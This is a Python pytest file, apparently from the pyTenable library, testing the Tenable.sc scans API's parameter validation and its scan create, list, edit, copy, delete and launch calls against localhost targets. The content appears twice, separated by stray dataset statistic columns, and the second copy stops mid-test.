def test_schedule_constructor_start_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._schedule_constructor(
{'type': 'ical', 'start': 1, 'repeatRule': ''})
def test_schedule_constructor_rrule_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._schedule_constructor(
{'type': 'ical', 'start': '', 'repeatRule': 1})
def test_scans_constructor_name_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(name=1)
def test_scans_constructor_type_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(type=1)
def test_scans_constructor_type_unexpectedvalueerror(sc):
with pytest.raises(UnexpectedValueError):
sc.scans._constructor(type='something')
def test_scans_constructor_description_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(description=1)
def test_scans_constructor_repo_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(repo='nope')
def test_scans_constructor_repo_success(sc):
resp = sc.scans._constructor(repo=1)
assert resp == {'repository': {'id': 1}}
def test_scans_constructor_scan_zone_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(scan_zone='nope')
def test_scans_constructor_scan_zone_success(sc):
resp = sc.scans._constructor(scan_zone=1)
assert resp == {'zone': {'id': 1}}
def test_scans_constructor_email_complete_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(email_complete='nope')
def test_scans_constructor_email_complete_success(sc):
resp = sc.scans._constructor(email_complete=True)
assert resp == {'emailOnFinish': 'true'}
def test_scans_constructor_email_launch_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(email_launch='nope')
def test_scans_constructor_email_launch_success(sc):
resp = sc.scans._constructor(email_launch=True)
assert resp == {'emailOnLaunch': 'true'}
def test_scans_constructor_timeout_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(timeout=1)
def test_scans_constructor_timeout_unexpectedvalueerror(sc):
with pytest.raises(UnexpectedValueError):
sc.scans._constructor(timeout='something')
def test_scans_constructor_timeout_success(sc):
resp = sc.scans._constructor(timeout='rollover')
assert resp == {'timeoutAction': 'rollover'}
def test_scans_constructor_host_tracking_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(host_tracking='something')
def test_scans_constructor_host_tracking_success(sc):
assert {'dhcpTracking': 'true'} == sc.scans._constructor(host_tracking=True)
def test_scans_constructor_vhosts_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(vhosts='nope')
def test_scans_constructor_vhosts_success(sc):
resp = sc.scans._constructor(vhosts=True)
assert resp == {'scanningVirtualHosts': 'true'}
def test_scans_constructor_rollover_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(rollover=1)
def test_scans_constructor_rollover_unexpectedvalueerror(sc):
with pytest.raises(UnexpectedValueError):
sc.scans._constructor(rollover='something')
def test_scans_constructor_rollover_success(sc):
assert {'rolloverType': 'nextDay'} == sc.scans._constructor(rollover='nextDay')
def test_scans_constructor_targets_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(targets='something')
def test_scans_constructor_targets_success(sc):
resp = sc.scans._constructor(targets=['127.0.0.1', '127.0.0.2'])
assert resp == {'ipList': '127.0.0.1,127.0.0.2'}
def test_scans_constructor_max_time_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(max_time='nope')
def test_scans_constructor_max_time_success(sc):
resp = sc.scans._constructor(max_time=3600)
assert resp == {'maxScanTime': '3600'}
def test_scans_constructor_max_time_zero(sc):
resp = sc.scans._constructor(max_time=0)
assert resp == {'maxScanTime': 'unlimited'}
def test_scans_constructor_schedule_success(sc):
scan = sc.scans._constructor(schedule={'type': 'ical', 'start': ''})
assert {'schedule': {'type': 'ical', 'start': ''}} == scan
def test_scans_constructor_auto_mitigation_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(auto_mitigation='nope')
def test_scans_constructor_auto_mitigation_success(sc):
resp = sc.scans._constructor(auto_mitigation=True)
assert resp == {'classifyMitigatedAge': 'true'}
def test_scans_constructor_reports_typeerror_base(sc):
with pytest.raises(TypeError):
sc.scans._constructor(reports='nope')
def test_scans_constructor_reports_typeerror_id(sc):
with pytest.raises(TypeError):
sc.scans._constructor(reports=[
{'id': 'nope', 'reportSource': 'cumulative'}])
def test_scans_constructor_reports_typeerror_report_source(sc):
with pytest.raises(TypeError):
sc.scans._constructor(reports=[
{'id': 1, 'reportSource': 1}])
def test_scans_constructor_reports_unexpectedvalueerror_reportsource(sc):
with pytest.raises(UnexpectedValueError):
sc.scans._constructor(reports=[
{'id': 1, 'reportSource': 'something'}])
def test_scans_constructor_reports_success(sc):
resp = sc.scans._constructor(reports=[
{'id': 1, 'reportSource': 'cumulative'}])
assert resp == {'reports': [{'id': 1, 'reportSource': 'cumulative'}]}
def test_scans_constructor_asset_lists_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(asset_lists=1)
def test_scans_constructor_asset_list_id_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(asset_lists=['nope', ])
def test_scans_constructor_asset_lists_success(sc):
resp = sc.scans._constructor(asset_lists=[1, 2])
assert resp == {'assets': [{'id': 1}, {'id': 2}]}
def test_scans_constructor_creds_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(creds=1)
def test_scans_constructor_creds_id_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(creds=['nope'])
def test_scans_constructor_creds_success(sc):
resp = sc.scans._constructor(creds=[1, 2])
assert resp == {'credentials': [{'id': 1}, {'id': 2}]}
def test_scans_constructor_both_policu_and_plugin_unexpectedvalueerror(sc):
with pytest.raises(UnexpectedValueError):
sc.scans._constructor(plugin_id=1, policy_id=1)
def test_scans_constructor_plugin_id_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(plugin_id='nope')
def test_scans_constructor_plugin_id_success(sc):
resp = sc.scans._constructor(plugin_id=19506)
assert resp == {'type': 'plugin', 'pluginID': 19506}
def test_scans_constructor_policy_id_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(policy_id='nope')
def test_scans_constructor_policy_id_success(sc):
resp = sc.scans._constructor(policy_id=1)
assert resp == {'type': 'policy', 'policy': {'id': 1}}
@pytest.fixture
def scan(request, sc, vcr):
with vcr.use_cassette('sc_scans_create'):
scan = sc.scans.create('Example Scan', 1,
schedule_type='template',
targets=['127.0.0.1'],
policy_id=1000001)
def teardown():
try:
sc.scans.delete(int(scan['id']))
except APIError:
pass
request.addfinalizer(teardown)
return scan
@pytest.mark.vcr()
def test_scans_list(sc):
scans = sc.scans.list()
for scan in scans['usable']:
assert isinstance(scan, dict)
check(scan, 'id', str)
check(scan, 'name', str)
check(scan, 'description', str)
check(scan, 'status', str)
@pytest.mark.vcr()
def test_scans_list_for_fields(sc):
scans = sc.scans.list(fields=['id', 'name'])
for scan in scans['usable']:
assert isinstance(scan, dict)
check(scan, 'id', str)
check(scan, 'name', str)
@pytest.mark.vcr()
def test_scans_details(sc, scan):
scan = sc.scans.details(int(scan['id']))
assert isinstance(scan, dict)
check(scan, 'id', str)
check(scan, 'name', str)
check(scan, 'description', str)
check(scan, 'ipList', str)
check(scan, 'type', str)
check(scan, 'dhcpTracking', str)
check(scan, 'classifyMitigatedAge', str)
check(scan, 'emailOnLaunch', str)
check(scan, 'emailOnFinish', str)
check(scan, 'timeoutAction', str)
check(scan, 'scanningVirtualHosts', str)
check(scan, 'rolloverType', str)
check(scan, 'status', str)
check(scan, 'createdTime', str)
check(scan, 'modifiedTime', str)
check(scan, 'reports', list)
check(scan, 'assets', list)
check(scan, 'numDependents', str)
check(scan, 'schedule', dict)
check(scan['schedule'], 'id', str)
check(scan['schedule'], 'type', str)
check(scan['schedule'], 'start', str)
check(scan['schedule'], 'repeatRule', str)
check(scan['schedule'], 'nextRun', int)
check(scan, 'policy', dict)
check(scan['policy'], 'id', str)
check(scan['policy'], 'name', str)
check(scan['policy'], 'description', str)
check(scan, 'policyPrefs', list)
check(scan, 'repository', dict)
check(scan['repository'], 'id', str)
check(scan['repository'], 'name', str)
check(scan['repository'], 'description', str)
check(scan, 'ownerGroup', dict)
check(scan['ownerGroup'], 'id', str)
check(scan['ownerGroup'], 'name', str)
check(scan['ownerGroup'], 'description', str)
check(scan, 'creator', dict)
check(scan['creator'], 'id', str)
check(scan['creator'], 'username', str)
check(scan['creator'], 'firstname', str)
check(scan['creator'], 'lastname', str)
check(scan, 'owner', dict)
check(scan['owner'], 'id', str)
check(scan['owner'], 'username', str)
check(scan['owner'], 'firstname', str)
check(scan['owner'], 'lastname', str)
@pytest.mark.vcr()
def test_scans_details_for_fields(sc, scan):
scan_details = sc.scans.details(int(scan['id']), fields=['id', 'name', 'description'])
assert isinstance(scan_details, dict)
check(scan_details, 'id', str)
check(scan_details, 'name', str)
check(scan_details, 'description', str)
@pytest.mark.vcr()
def test_scans_create(scan):
assert isinstance(scan, dict)
check(scan, 'id', str)
check(scan, 'name', str)
check(scan, 'description', str)
check(scan, 'ipList', str)
check(scan, 'type', str)
check(scan, 'dhcpTracking', str)
check(scan, 'classifyMitigatedAge', str)
check(scan, 'emailOnLaunch', str)
check(scan, 'emailOnFinish', str)
check(scan, 'timeoutAction', str)
check(scan, 'scanningVirtualHosts', str)
check(scan, 'rolloverType', str)
check(scan, 'status', str)
check(scan, 'createdTime', str)
check(scan, 'modifiedTime', str)
check(scan, 'reports', list)
check(scan, 'assets', list)
check(scan, 'numDependents', str)
check(scan, 'schedule', dict)
check(scan['schedule'], 'id', str)
check(scan['schedule'], 'type', str)
check(scan['schedule'], 'start', str)
check(scan['schedule'], 'repeatRule', str)
check(scan['schedule'], 'nextRun', int)
check(scan, 'policy', dict)
check(scan['policy'], 'id', str)
check(scan['policy'], 'name', str)
check(scan['policy'], 'description', str)
check(scan, 'policyPrefs', list)
check(scan, 'repository', dict)
check(scan['repository'], 'id', str)
check(scan['repository'], 'name', str)
check(scan['repository'], 'description', str)
check(scan, 'ownerGroup', dict)
check(scan['ownerGroup'], 'id', str)
check(scan['ownerGroup'], 'name', str)
check(scan['ownerGroup'], 'description', str)
check(scan, 'creator', dict)
check(scan['creator'], 'id', str)
check(scan['creator'], 'username', str)
check(scan['creator'], 'firstname', str)
check(scan['creator'], 'lastname', str)
check(scan, 'owner', dict)
check(scan['owner'], 'id', str)
check(scan['owner'], 'username', str)
check(scan['owner'], 'firstname', str)
check(scan['owner'], 'lastname', str)
@pytest.mark.vcr()
def test_scans_create_plugin(sc):
scan = sc.scans.create('Example Scan 9', 9,
schedule_type='template',
targets=['127.0.0.1'],
plugin_id=1000001)
assert isinstance(scan, dict)
check(scan, 'id', str)
check(scan, 'name', str)
check(scan, 'description', str)
sc.scans.delete(int(scan['id']))
@pytest.mark.vcr()
def test_scans_edit(sc, scan):
scan = sc.scans.edit(int(scan['id']), name='Edited Example Scan')
assert isinstance(scan, dict)
check(scan, 'id', str)
check(scan, 'name', str)
check(scan, 'description', str)
check(scan, 'ipList', str)
check(scan, 'type', str)
check(scan, 'dhcpTracking', str)
check(scan, 'classifyMitigatedAge', str)
check(scan, 'emailOnLaunch', str)
check(scan, 'emailOnFinish', str)
check(scan, 'timeoutAction', str)
check(scan, 'scanningVirtualHosts', str)
check(scan, 'rolloverType', str)
check(scan, 'status', str)
check(scan, 'createdTime', str)
check(scan, 'modifiedTime', str)
check(scan, 'reports', list)
check(scan, 'assets', list)
check(scan, 'numDependents', str)
check(scan, 'schedule', dict)
check(scan['schedule'], 'id', str)
check(scan['schedule'], 'type', str)
check(scan['schedule'], 'start', str)
check(scan['schedule'], 'repeatRule', str)
check(scan['schedule'], 'nextRun', int)
check(scan, 'policy', dict)
check(scan['policy'], 'id', str)
check(scan['policy'], 'name', str)
check(scan['policy'], 'description', str)
check(scan, 'policyPrefs', list)
check(scan, 'repository', dict)
check(scan['repository'], 'id', str)
check(scan['repository'], 'name', str)
check(scan['repository'], 'description', str)
check(scan, 'ownerGroup', dict)
check(scan['ownerGroup'], 'id', str)
check(scan['ownerGroup'], 'name', str)
check(scan['ownerGroup'], 'description', str)
check(scan, 'creator', dict)
check(scan['creator'], 'id', str)
check(scan['creator'], 'username', str)
check(scan['creator'], 'firstname', str)
check(scan['creator'], 'lastname', str)
check(scan, 'owner', dict)
check(scan['owner'], 'id', str)
check(scan['owner'], 'username', str)
check(scan['owner'], 'firstname', str)
check(scan['owner'], 'lastname', str)
@pytest.mark.vcr()
def test_scans_delete(scan, sc):
sc.scans.delete(int(scan['id']))
@pytest.mark.vcr()
def test_scans_copy(scan, sc):
scan = sc.scans.copy(int(scan['id']), 'scan_copy', 1)
sc.scans.delete(int(scan['id']))
assert isinstance(scan, dict)
check(scan, 'id', str)
check(scan, 'name', str)
check(scan, 'description', str)
check(scan, 'ipList', str)
check(scan, 'type', str)
check(scan, 'dhcpTracking', str)
check(scan, 'classifyMitigatedAge', str)
check(scan, 'emailOnLaunch', str)
check(scan, 'emailOnFinish', str)
check(scan, 'timeoutAction', str)
check(scan, 'scanningVirtualHosts', str)
check(scan, 'rolloverType', str)
check(scan, 'status', str)
check(scan, 'createdTime', str)
check(scan, 'modifiedTime', str)
check(scan, 'reports', list)
check(scan, 'assets', list)
check(scan, 'numDependents', str)
check(scan, 'schedule', dict)
check(scan['schedule'], 'id', str)
check(scan['schedule'], 'type', str)
check(scan['schedule'], 'start', str)
check(scan['schedule'], 'repeatRule', str)
check(scan['schedule'], 'nextRun', int)
check(scan, 'policy', dict)
check(scan['policy'], 'id', str)
check(scan['policy'], 'name', str)
check(scan['policy'], 'description', str)
check(scan, 'policyPrefs', list)
check(scan, 'repository', dict)
check(scan['repository'], 'id', str)
check(scan['repository'], 'name', str)
check(scan['repository'], 'description', str)
check(scan, 'ownerGroup', dict)
check(scan['ownerGroup'], 'id', str)
check(scan['ownerGroup'], 'name', str)
check(scan['ownerGroup'], 'description', str)
check(scan, 'creator', dict)
check(scan['creator'], 'id', str)
check(scan['creator'], 'username', str)
check(scan['creator'], 'firstname', str)
check(scan['creator'], 'lastname', str)
check(scan, 'owner', dict)
check(scan['owner'], 'id', str)
check(scan['owner'], 'username', str)
check(scan['owner'], 'firstname', str)
check(scan['owner'], 'lastname', str)
@pytest.mark.vcr()
def test_scans_launch(sc, scan):
launch = sc.scans.launch(int(scan['id']), diagnostic_target='target', diagnostic_password='password')
assert isinstance(launch, dict)
check(launch, 'scanID', str)
check(launch, 'scanResult', dict)
check(launch['scanResult'], 'initiatorID', str)
check(launch['scanResult'], 'ownerID', str)
check(launch['scanResult'], 'scanID', str)
check(launch['scanResult'], 'repositoryID', str)
check(launch['scanResult'], 'jobID', str)
check(launch['scanResult'], 'name', str)
check(launch['scanResult'], 'description', str, allow_none=True)
check(launch['scanResult'], 'details', str)
check(launch['scanResult'], 'status', str)
check(launch['scanResult'], 'downloadFormat', str)
check(launch['scanResult'], 'dataFormat', str)
check(launch['scanResult'], 'id', str)
| 32.644524
| 105
| 0.665512
|
import pytest
from tenable.errors import APIError, UnexpectedValueError
from ..checker import check
def test_schedule_constructor_type_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._schedule_constructor({'type': 1})
def test_schedule_constructor_type_unexpected_value(sc):
with pytest.raises(UnexpectedValueError):
sc.scans._schedule_constructor({'type': 'nothing here'})
def test_schedule_constructor_start_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._schedule_constructor(
{'type': 'ical', 'start': 1, 'repeatRule': ''})
def test_schedule_constructor_rrule_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._schedule_constructor(
{'type': 'ical', 'start': '', 'repeatRule': 1})
def test_scans_constructor_name_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(name=1)
def test_scans_constructor_type_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(type=1)
def test_scans_constructor_type_unexpectedvalueerror(sc):
with pytest.raises(UnexpectedValueError):
sc.scans._constructor(type='something')
def test_scans_constructor_description_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(description=1)
def test_scans_constructor_repo_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(repo='nope')
def test_scans_constructor_repo_success(sc):
resp = sc.scans._constructor(repo=1)
assert resp == {'repository': {'id': 1}}
def test_scans_constructor_scan_zone_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(scan_zone='nope')
def test_scans_constructor_scan_zone_success(sc):
resp = sc.scans._constructor(scan_zone=1)
assert resp == {'zone': {'id': 1}}
def test_scans_constructor_email_complete_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(email_complete='nope')
def test_scans_constructor_email_complete_success(sc):
resp = sc.scans._constructor(email_complete=True)
assert resp == {'emailOnFinish': 'true'}
def test_scans_constructor_email_launch_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(email_launch='nope')
def test_scans_constructor_email_launch_success(sc):
resp = sc.scans._constructor(email_launch=True)
assert resp == {'emailOnLaunch': 'true'}
def test_scans_constructor_timeout_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(timeout=1)
def test_scans_constructor_timeout_unexpectedvalueerror(sc):
with pytest.raises(UnexpectedValueError):
sc.scans._constructor(timeout='something')
def test_scans_constructor_timeout_success(sc):
resp = sc.scans._constructor(timeout='rollover')
assert resp == {'timeoutAction': 'rollover'}
def test_scans_constructor_host_tracking_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(host_tracking='something')
def test_scans_constructor_host_tracking_success(sc):
assert {'dhcpTracking': 'true'} == sc.scans._constructor(host_tracking=True)
def test_scans_constructor_vhosts_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(vhosts='nope')
def test_scans_constructor_vhosts_success(sc):
resp = sc.scans._constructor(vhosts=True)
assert resp == {'scanningVirtualHosts': 'true'}
def test_scans_constructor_rollover_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(rollover=1)
def test_scans_constructor_rollover_unexpectedvalueerror(sc):
with pytest.raises(UnexpectedValueError):
sc.scans._constructor(rollover='something')
def test_scans_constructor_rollover_success(sc):
assert {'rolloverType': 'nextDay'} == sc.scans._constructor(rollover='nextDay')
def test_scans_constructor_targets_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(targets='something')
def test_scans_constructor_targets_success(sc):
resp = sc.scans._constructor(targets=['127.0.0.1', '127.0.0.2'])
assert resp == {'ipList': '127.0.0.1,127.0.0.2'}
def test_scans_constructor_max_time_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(max_time='nope')
def test_scans_constructor_max_time_success(sc):
resp = sc.scans._constructor(max_time=3600)
assert resp == {'maxScanTime': '3600'}
def test_scans_constructor_max_time_zero(sc):
resp = sc.scans._constructor(max_time=0)
assert resp == {'maxScanTime': 'unlimited'}
def test_scans_constructor_schedule_success(sc):
scan = sc.scans._constructor(schedule={'type': 'ical', 'start': ''})
assert {'schedule': {'type': 'ical', 'start': ''}} == scan
def test_scans_constructor_auto_mitigation_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(auto_mitigation='nope')
def test_scans_constructor_auto_mitigation_success(sc):
resp = sc.scans._constructor(auto_mitigation=True)
assert resp == {'classifyMitigatedAge': 'true'}
def test_scans_constructor_reports_typeerror_base(sc):
with pytest.raises(TypeError):
sc.scans._constructor(reports='nope')
def test_scans_constructor_reports_typeerror_id(sc):
with pytest.raises(TypeError):
sc.scans._constructor(reports=[
{'id': 'nope', 'reportSource': 'cumulative'}])
def test_scans_constructor_reports_typeerror_report_source(sc):
with pytest.raises(TypeError):
sc.scans._constructor(reports=[
{'id': 1, 'reportSource': 1}])
def test_scans_constructor_reports_unexpectedvalueerror_reportsource(sc):
with pytest.raises(UnexpectedValueError):
sc.scans._constructor(reports=[
{'id': 1, 'reportSource': 'something'}])
def test_scans_constructor_reports_success(sc):
resp = sc.scans._constructor(reports=[
{'id': 1, 'reportSource': 'cumulative'}])
assert resp == {'reports': [{'id': 1, 'reportSource': 'cumulative'}]}
def test_scans_constructor_asset_lists_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(asset_lists=1)
def test_scans_constructor_asset_list_id_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(asset_lists=['nope', ])
def test_scans_constructor_asset_lists_success(sc):
resp = sc.scans._constructor(asset_lists=[1, 2])
assert resp == {'assets': [{'id': 1}, {'id': 2}]}
def test_scans_constructor_creds_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(creds=1)
def test_scans_constructor_creds_id_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(creds=['nope'])
def test_scans_constructor_creds_success(sc):
resp = sc.scans._constructor(creds=[1, 2])
assert resp == {'credentials': [{'id': 1}, {'id': 2}]}
def test_scans_constructor_both_policu_and_plugin_unexpectedvalueerror(sc):
with pytest.raises(UnexpectedValueError):
sc.scans._constructor(plugin_id=1, policy_id=1)
def test_scans_constructor_plugin_id_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(plugin_id='nope')
def test_scans_constructor_plugin_id_success(sc):
resp = sc.scans._constructor(plugin_id=19506)
assert resp == {'type': 'plugin', 'pluginID': 19506}
def test_scans_constructor_policy_id_typeerror(sc):
with pytest.raises(TypeError):
sc.scans._constructor(policy_id='nope')
def test_scans_constructor_policy_id_success(sc):
resp = sc.scans._constructor(policy_id=1)
assert resp == {'type': 'policy', 'policy': {'id': 1}}
@pytest.fixture
def scan(request, sc, vcr):
with vcr.use_cassette('sc_scans_create'):
scan = sc.scans.create('Example Scan', 1,
schedule_type='template',
targets=['127.0.0.1'],
policy_id=1000001)
def teardown():
try:
sc.scans.delete(int(scan['id']))
except APIError:
pass
request.addfinalizer(teardown)
return scan
@pytest.mark.vcr()
def test_scans_list(sc):
scans = sc.scans.list()
for scan in scans['usable']:
assert isinstance(scan, dict)
check(scan, 'id', str)
check(scan, 'name', str)
check(scan, 'description', str)
check(scan, 'status', str)
@pytest.mark.vcr()
def test_scans_list_for_fields(sc):
scans = sc.scans.list(fields=['id', 'name'])
for scan in scans['usable']:
assert isinstance(scan, dict)
check(scan, 'id', str)
check(scan, 'name', str)
@pytest.mark.vcr()
def test_scans_details(sc, scan):
scan = sc.scans.details(int(scan['id']))
assert isinstance(scan, dict)
check(scan, 'id', str)
check(scan, 'name', str)
check(scan, 'description', str)
check(scan, 'ipList', str)
check(scan, 'type', str)
check(scan, 'dhcpTracking', str)
check(scan, 'classifyMitigatedAge', str)
check(scan, 'emailOnLaunch', str)
check(scan, 'emailOnFinish', str)
check(scan, 'timeoutAction', str)
check(scan, 'scanningVirtualHosts', str)
check(scan, 'rolloverType', str)
check(scan, 'status', str)
check(scan, 'createdTime', str)
check(scan, 'modifiedTime', str)
check(scan, 'reports', list)
check(scan, 'assets', list)
check(scan, 'numDependents', str)
check(scan, 'schedule', dict)
check(scan['schedule'], 'id', str)
check(scan['schedule'], 'type', str)
check(scan['schedule'], 'start', str)
check(scan['schedule'], 'repeatRule', str)
check(scan['schedule'], 'nextRun', int)
check(scan, 'policy', dict)
check(scan['policy'], 'id', str)
check(scan['policy'], 'name', str)
check(scan['policy'], 'description', str)
check(scan, 'policyPrefs', list)
check(scan, 'repository', dict)
check(scan['repository'], 'id', str)
check(scan['repository'], 'name', str)
check(scan['repository'], 'description', str)
check(scan, 'ownerGroup', dict)
check(scan['ownerGroup'], 'id', str)
check(scan['ownerGroup'], 'name', str)
check(scan['ownerGroup'], 'description', str)
check(scan, 'creator', dict)
check(scan['creator'], 'id', str)
check(scan['creator'], 'username', str)
check(scan['creator'], 'firstname', str)
check(scan['creator'], 'lastname', str)
check(scan, 'owner', dict)
check(scan['owner'], 'id', str)
check(scan['owner'], 'username', str)
check(scan['owner'], 'firstname', str)
check(scan['owner'], 'lastname', str)
@pytest.mark.vcr()
def test_scans_details_for_fields(sc, scan):
scan_details = sc.scans.details(int(scan['id']), fields=['id', 'name', 'description'])
assert isinstance(scan_details, dict)
check(scan_details, 'id', str)
check(scan_details, 'name', str)
check(scan_details, 'description', str)
@pytest.mark.vcr()
def test_scans_create(scan):
assert isinstance(scan, dict)
check(scan, 'id', str)
check(scan, 'name', str)
check(scan, 'description', str)
check(scan, 'ipList', str)
check(scan, 'type', str)
check(scan, 'dhcpTracking', str)
check(scan, 'classifyMitigatedAge', str)
check(scan, 'emailOnLaunch', str)
check(scan, 'emailOnFinish', str)
check(scan, 'timeoutAction', str)
check(scan, 'scanningVirtualHosts', str)
check(scan, 'rolloverType', str)
check(scan, 'status', str)
check(scan, 'createdTime', str)
check(scan, 'modifiedTime', str)
check(scan, 'reports', list)
check(scan, 'assets', list)
check(scan, 'numDependents', str)
check(scan, 'schedule', dict)
check(scan['schedule'], 'id', str)
check(scan['schedule'], 'type', str)
check(scan['schedule'], 'start', str)
check(scan['schedule'], 'repeatRule', str)
check(scan['schedule'], 'nextRun', int)
check(scan, 'policy', dict)
check(scan['policy'], 'id', str)
check(scan['policy'], 'name', str)
check(scan['policy'], 'description', str)
check(scan, 'policyPrefs', list)
check(scan, 'repository', dict)
check(scan['repository'], 'id', str)
check(scan['repository'], 'name', str)
check(scan['repository'], 'description', str)
check(scan, 'ownerGroup', dict)
check(scan['ownerGroup'], 'id', str)
check(scan['ownerGroup'], 'name', str)
check(scan['ownerGroup'], 'description', str)
check(scan, 'creator', dict)
check(scan['creator'], 'id', str)
check(scan['creator'], 'username', str)
check(scan['creator'], 'firstname', str)
check(scan['creator'], 'lastname', str)
check(scan, 'owner', dict)
check(scan['owner'], 'id', str)
check(scan['owner'], 'username', str)
check(scan['owner'], 'firstname', str)
check(scan['owner'], 'lastname', str)
@pytest.mark.vcr()
def test_scans_create_plugin(sc):
scan = sc.scans.create('Example Scan 9', 9,
schedule_type='template',
targets=['127.0.0.1'],
plugin_id=1000001)
assert isinstance(scan, dict)
check(scan, 'id', str)
check(scan, 'name', str)
check(scan, 'description', str)
sc.scans.delete(int(scan['id']))
@pytest.mark.vcr()
def test_scans_edit(sc, scan):
scan = sc.scans.edit(int(scan['id']), name='Edited Example Scan')
assert isinstance(scan, dict)
check(scan, 'id', str)
check(scan, 'name', str)
check(scan, 'description', str)
check(scan, 'ipList', str)
check(scan, 'type', str)
check(scan, 'dhcpTracking', str)
check(scan, 'classifyMitigatedAge', str)
check(scan, 'emailOnLaunch', str)
check(scan, 'emailOnFinish', str)
check(scan, 'timeoutAction', str)
check(scan, 'scanningVirtualHosts', str)
check(scan, 'rolloverType', str)
check(scan, 'status', str)
check(scan, 'createdTime', str)
check(scan, 'modifiedTime', str)
check(scan, 'reports', list)
check(scan, 'assets', list)
check(scan, 'numDependents', str)
check(scan, 'schedule', dict)
check(scan['schedule'], 'id', str)
check(scan['schedule'], 'type', str)
check(scan['schedule'], 'start', str)
check(scan['schedule'], 'repeatRule', str)
check(scan['schedule'], 'nextRun', int)
check(scan, 'policy', dict)
check(scan['policy'], 'id', str)
check(scan['policy'], 'name', str)
check(scan['policy'], 'description', str)
check(scan, 'policyPrefs', list)
check(scan, 'repository', dict)
check(scan['repository'], 'id', str)
check(scan['repository'], 'name', str)
check(scan['repository'], 'description', str)
check(scan, 'ownerGroup', dict)
check(scan['ownerGroup'], 'id', str)
check(scan['ownerGroup'], 'name', str)
check(scan['ownerGroup'], 'description', str)
check(scan, 'creator', dict)
check(scan['creator'], 'id', str)
check(scan['creator'], 'username', str)
check(scan['creator'], 'firstname', str)
check(scan['creator'], 'lastname', str)
check(scan, 'owner', dict)
check(scan['owner'], 'id', str)
check(scan['owner'], 'username', str)
check(scan['owner'], 'firstname', str)
check(scan['owner'], 'lastname', str)
@pytest.mark.vcr()
def test_scans_delete(scan, sc):
sc.scans.delete(int(scan['id']))
@pytest.mark.vcr()
def test_scans_copy(scan, sc):
scan = sc.scans.copy(int(scan['id']), 'scan_copy', 1)
sc.scans.delete(int(scan['id']))
assert isinstance(scan, dict)
check(scan, 'id', str)
check(scan, 'name', str)
check(scan, 'description', str)
check(scan, 'ipList', str)
check(scan, 'type', str)
check(scan, 'dhcpTracking', str)
check(scan, 'classifyMitigatedAge', str)
check(scan, 'emailOnLaunch', str)
check(scan, 'emailOnFinish', str)
check(scan, 'timeoutAction', str)
check(scan, 'scanningVirtualHosts', str)
check(scan, 'rolloverType', str)
check(scan, 'status', str)
check(scan, 'createdTime', str)
check(scan, 'modifiedTime', str)
check(scan, 'reports', list)
check(scan, 'assets', list)
check(scan, 'numDependents', str)
check(scan, 'schedule', dict)
check(scan['schedule'], 'id', str)
check(scan['schedule'], 'type', str)
check(scan['schedule'], 'start', str)
check(scan['schedule'], 'repeatRule', str)
check(scan['schedule'], 'nextRun', int)
check(scan, 'policy', dict)
check(scan['policy'], 'id', str)
check(scan['policy'], 'name', str)
check(scan['policy'], 'description', str)
check(scan, 'policyPrefs', list)
check(scan, 'repository', dict)
check(scan['repository'], 'id', str)
check(scan['repository'], 'name', str)
check(scan['repository'], 'description', str)
check(scan, 'ownerGroup', dict)
check(scan['ownerGroup'], 'id', str)
check(scan['ownerGroup'], 'name', str)
check(scan['ownerGroup'], 'description', str)
check(scan, 'creator', dict)
check(scan['creator'], 'id', str)
check(scan['creator'], 'username', str)
check(scan['creator'], 'firstname', str)
check(scan['creator'], 'lastname', str)
check(scan, 'owner', dict)
check(scan['owner'], 'id', str)
check(scan['owner'], 'username', str)
check(scan['owner'], 'firstname', str)
check(scan['owner'], 'lastname', str)
@pytest.mark.vcr()
def test_scans_launch(sc, scan):
launch = sc.scans.launch(int(scan['id']), diagnostic_target='target', diagnostic_password='password')
assert isinstance(launch, dict)
check(launch, 'scanID', str)
check(launch, 'scanResult', dict)
check(launch['scanResult'], 'initiatorID', str)
check(launch['scanResult'], 'ownerID', str)
check(launch['scanResult'], 'scanID', str)
check(launch['scanResult'], 'repositoryID', str)
